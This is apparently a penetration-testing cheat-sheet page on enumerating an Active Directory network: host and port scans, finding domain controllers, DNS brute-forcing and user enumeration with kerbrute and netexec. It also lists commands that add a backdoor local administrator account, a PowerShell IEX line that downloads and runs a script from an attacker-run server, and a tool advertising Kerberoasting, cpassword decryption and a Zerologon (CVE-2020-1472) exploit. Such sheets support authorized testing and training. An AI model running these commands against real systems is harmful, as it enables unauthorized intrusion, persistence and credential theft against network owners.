Domain Network Enumeration

Enumerate the network and its services, find the DC,

Network Enumeration

nmap -sP -p $ip #ping scan
nmap -Pn -n -T4 -v3 $ip #quick scan
rustscan -a $ip

Domain Name

nxc smb $network_ip

Domain Controllers

They are usually DNS Servers. They have usually LDAP listening port 389.

# with nmap
nmap -p53,88,389 $network_ip --open -v -oN dc
# with nmcli
nmcli dev show $iface
# with nslookup
nslookup -type=SRV _ldap._tcp.dc.msdcs.$domain

Enumerate alive machines

# with zmap
sudo zmap -i $iface -P 2 --probe-module=icmp_echoscan -B 1M --max-targets=10000000 -o targets_rfc1918.txt $network_ips

# with arp-scan
arp-scan -d $networkrange

# with nxc - smb, ssh, rdp
nxc smb $networkrange

Enumerate services

DNS

# test for dns attacks
dnsenum $domain -f /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt --dnsserver $dns_server_ip > dnsenum.txt

# discover printers, web, shares, vpn, media
gobuster dns -d $domain -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

Users Enumeration

# LINUX HOST
# no auth
# netexec
nxc smb $ip -u anonymous -p "" --rid-brute 10000

# kerbrute
kerbrute -domain $domain -dc-ip $ip -users /tools/payloads/SecLists/Usernames/xato-net-10-million-usernames.txt

# WINDOWS HOST
GetADUsers.py $domain/ -dc-ip $ip

# Get all of the OUs in a domain
Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A

### Create a new user in admin groupe 

# username:password = anon:p3nT3st!
net user anon p3nT3st! /add
net localgroup administrators anon /add

net user anon p3nT3st! /add;net localgroup administrators anon /add

If you cannot import module start a webserver and
IEX(New-Object Net.Webclient).downloadstring('http://<IP>/Powershell.ps1')

Automatic tools

AD Enum

ASREPRoasting
Kerberoasting
Dump AD as BloodHound JSON files
Searching GPOs in SYSVOL for cpassword and decrypting
Run without creds and attempt to gather for further enumeration during the run
Sample exploits included:
- CVE-2020-1472

GitHub - CasperGN/ActiveDirectoryEnumeration: Enumerate AD through LDAP with a collection of helpfull scripts being bundledGitHub

Install

pip3 install ActiveDirectoryEnum
python -m ade

# query exploit for poc
python -m ade --exploit cve-2020-1472

Previous1. Reconnaissance NextSMB Enumeration

Last updated 1 year ago

Was this helpful?